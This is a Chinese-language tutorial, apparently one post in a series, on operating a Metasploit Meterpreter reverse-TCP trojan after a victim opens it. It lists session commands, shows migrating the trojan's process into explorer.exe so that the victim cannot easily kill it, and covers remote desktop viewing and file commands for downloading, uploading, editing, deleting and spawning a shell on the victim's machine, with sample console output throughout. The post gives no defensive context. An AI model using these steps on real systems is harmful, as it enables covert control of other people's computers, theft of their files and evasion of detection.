Metasloit之木马文件操作功能

Metasloit之木马文件操作功能

本章节内容是上接”09-Metasploit之我的远程控制软件”的，

首先还是生产木马，选择TCP反向连接方式，监听相关IP和端口，受害者打开木马，连接成功回显↓

meterpreter > 

进入meterpreter之后即可进行一些相关木马操作了，下面是正式本章内容

首先可以查看帮助文档，命令“help”，挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

background    -->背景当前会话，意思暂时不查看该连接会话
回显：[*] Backgrounding session 1...    -->当前会话转移后台，ID为1

sessions  或者sessions -l    -->查看当前后端有哪些连接会话
回显中一般都会出现Id数，想要哪个会话就去选择对应的会话Id即可

sessions -i 1    -->选择Id为1的连接会话，返回我们的木马连接，回显：
[*] Starting interaction with 1...
meterpreter > 

木马也有可能会被受害者发现，会被随时结束掉，所以我们可以利用“注入进程”技术
那么我们就得需要知道受害者的相关进程信息：

ps    -->查看进程信息
关于进程的选用一般选择的是explorer.exe,这个是桌面管理进程，若关闭该进程会导致桌面图标全部消失
查看进程后发现进程信息如下：
3764   3644   explorer.exe                x64   1        GOS-01601281118/Administrator  C:/Windows/explorer.exe                       //需要注入的进程

15856  3764   payload.exe                 x86   1        GOS-01601281118/Administrator  C:/Users/Administrator/Desktop/payload.exe    //我们的木马程序进程

其中PID就是进程ID，那么就是将15856进程注入进3764进程，使用“migrate”命令，如下：

migrate 3764    -->命令“migrate PID”，将当前连接的木马进程注入至PID为3764的进程中,回显:
meterpreter > migrate 3764
[*] Migrating from 15856 to 3764...
[*] Migration completed successfully.
meterpreter > 

表示成功注入，我们再回头查看我们的木马程序进程payload.exe还在不在（已经不在了）
注入成功后，我们再次dir查看当前目录下的文件和文件夹的时候已经默认explorer.exe的目录下了

run vnc    -->远程查看桌面
这里我本地调用了C:/Users/ADMINI~1/AppData/Local/Temp/seCpIyuPreHM.exe程序，但是在开启的时候报错

------------------------------------------------------------------------------------------------

文件管理功能-->Stdapi: File system Commands（文件系统命令）

cd          -->切换目录，cd e: 切换到E盘，利用“ls”和“dir”都可以查看当前目录文件文件夹

download    -->下载文件，download f:/test.txt

edit        -->编辑文件，edit f:/test.txt  这里使用了vim文本编辑功能
   
cat         -->查看文件，cat f:/test.txt

mkdir       -->创建文件夹，mkdir f:/litteryi

mv          -->移动文件，mv f:/test.txt e:/test.txt

rm          -->删除文件，rm f:/test.txt

upload      -->上传文件，upload test.txt f:/test.txt

rmdir       -->删除文件夹，rmdir f:/litteryi

shell       -->获取shell，这个功能相对比较弱，而且还根据情况可能会出现乱码